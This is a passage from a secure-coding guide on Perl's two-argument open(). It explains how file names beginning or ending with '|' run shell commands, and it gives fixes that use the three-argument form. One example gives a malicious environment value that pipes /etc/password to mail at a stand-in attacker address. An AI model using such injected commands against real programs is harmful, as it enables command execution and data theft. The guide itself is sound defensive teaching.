...
open FILEHANDLE,EXPR
open FILEHANDLE,MODE,EXPR
open FILEHANDLE,MODE,EXPR,LIST
open FILEHANDLE,MODE,REFERENCE
open FILEHANDLE
Opens the file whose filename is given by EXPR, and associates it with FILEHANDLE.
...
```perl
use Carp;

my $filename = shift @ARGV;  # initialize (assumed here: taken from the command line)
# Two-argument open(): the mode is parsed out of $filename itself
open(my $FILE, $filename) or croak("file not found");
while (<$FILE>) {
  print "$filename: $_";
}
```
Although this code clearly expects its file to be opened for reading, the file name might indicate a shell command. It might also indicate a file to be written rather than read.
...
```perl
use Carp;

my $filename = shift @ARGV;  # initialize (assumed here: taken from the command line)
# Still two-argument open(): the "<" is merely prepended to the name
open(my $FILE, "<$filename") or croak("file not found");
while (<$FILE>) {
  print "$filename: $_";
}
```
If `$filename` begins or ends with `|`, the preceding `<` forces it to be treated as a file name rather than a shell command.
This code will not execute a shell command. However, an attacker could cause a program to hang by supplying `-` as the file name, which is interpreted by `open()` as reading standard input.
...
This code suffers from the same vulnerability as the first noncompliant code example. The `<ARGV>` operator opens every file provided in the `@ARGV` array and returns a line from each file. Unfortunately, it uses the two-argument form of `open()` to accomplish this task. If any element of `@ARGV` begins or ends with `|`, it is interpreted as a shell command and executed.
...
```perl
use Carp;

my $filename = shift @ARGV;  # initialize (assumed here: taken from the command line)
# Three-argument open(): the mode is fixed, $filename is only a name
open(my $FILE, "<", $filename) or croak("file not found");
while (<$FILE>) {
  print "$filename: $_";
}
```
The three-argument invocations of `open()` are not subject to the same vulnerabilities as the two-argument `open()`. In this code, `$filename` is treated as a file name even if it contains characters that are treated specially by the two-argument `open()` function. For example, if `$filename` is specified as `-`, then the three-argument `open()` attempts to open a file named `-` rather than opening standard input.
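The difference between the two forms, as an added example that is not part of the original page: `two_arg_meaning()` reports how the two-argument form would interpret a name without opening anything, and `read_lines()` reads the same name with the three-argument form. Both function names and all sample file names are constructed for illustration, and a POSIX file system is assumed.

```perl
#!/usr/bin/perl
# Added example: constructed names, POSIX file system assumed.
use strict;
use warnings;
use Cwd qw(getcwd);
use File::Temp qw(tempdir);

# Describe how the two-argument open() would interpret $name.
# Nothing is opened here; this only mirrors the documented parsing rules.
sub two_arg_meaning {
    my ($name) = @_;
    (my $s = $name) =~ s/^\s+|\s+$//g;    # surrounding whitespace is ignored
    return 'standard input'          if $s eq '-';
    return 'command (pipe)'          if $s =~ /^\|/ || $s =~ /\|$/;
    return 'file opened for writing' if $s =~ /^\+?>/;
    return 'file opened read-write'  if $s =~ /^\+</;
    return 'file opened for reading';
}

# Three-argument open(): the mode is fixed, the name is only ever a name.
sub read_lines {
    my ($name) = @_;
    open(my $fh, '<', $name) or die "cannot open '$name': $!\n";
    my @lines = <$fh>;
    close($fh);
    return @lines;
}

my $old = getcwd();
my $dir = tempdir(CLEANUP => 1);
chdir($dir) or die "chdir: $!\n";

# Constructed sample names: each one is created as an ordinary file.
my @names = ('notes.txt', '-', 'echo hi |', '>report');
for my $name (@names) {
    open(my $out, '>', $name) or die "create '$name': $!\n";
    print {$out} "contents of [$name]\n";
    close($out);
}

for my $name (@names) {
    my @lines = read_lines($name);
    printf "%-12s two-arg: %-24s three-arg read: %s",
        "'$name'", two_arg_meaning($name), $lines[0];
}

chdir($old) or die "chdir back: $!\n";
```

The same classifier can be run over `@ARGV` before a `<ARGV>` loop to log or reject any argument that the two-argument form would not treat as a plain file to read.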
...
Because any user can invoke the `rt` executable with environment variables he or she controls, a hostile user may set the `RTCONFIG` environment variable to a malicious command, such as:
```
cat /etc/password | mail some@badguy.net |
```
...
This code causes `$file` to be treated as a file name regardless of what special characters it might contain.
Note that the last line of this compliant solution still violates FIO00-PL. Do not use bareword file handles.
Risk Assessment
Failure to handle error codes or other values returned by functions can lead to incorrect program flow and violations of data integrity.
Recommendation | Severity | Likelihood | Remediation Cost | Priority | Level |
---|---|---|---|---|---|
IDS31-PL | high | likely | low | P27 | L1 |
Automated Detection
Tool | Version | Checker | Description |
---|---|---|---|
Perl::Critic | 5.0 | InputOutput::ProhibitTwoArgOpen | Implemented |
B::Lint | 5.0 | Use of <> | Implemented |
Bibliography
...
...
...
...
[VU#496064] | ibrow NewsDesk does not securely handle input passed to open() |
[VU#671444] | Input validation error in quikstore.cgi allows attackers to execute commands |
[Wall 2011] | perlfunc |
...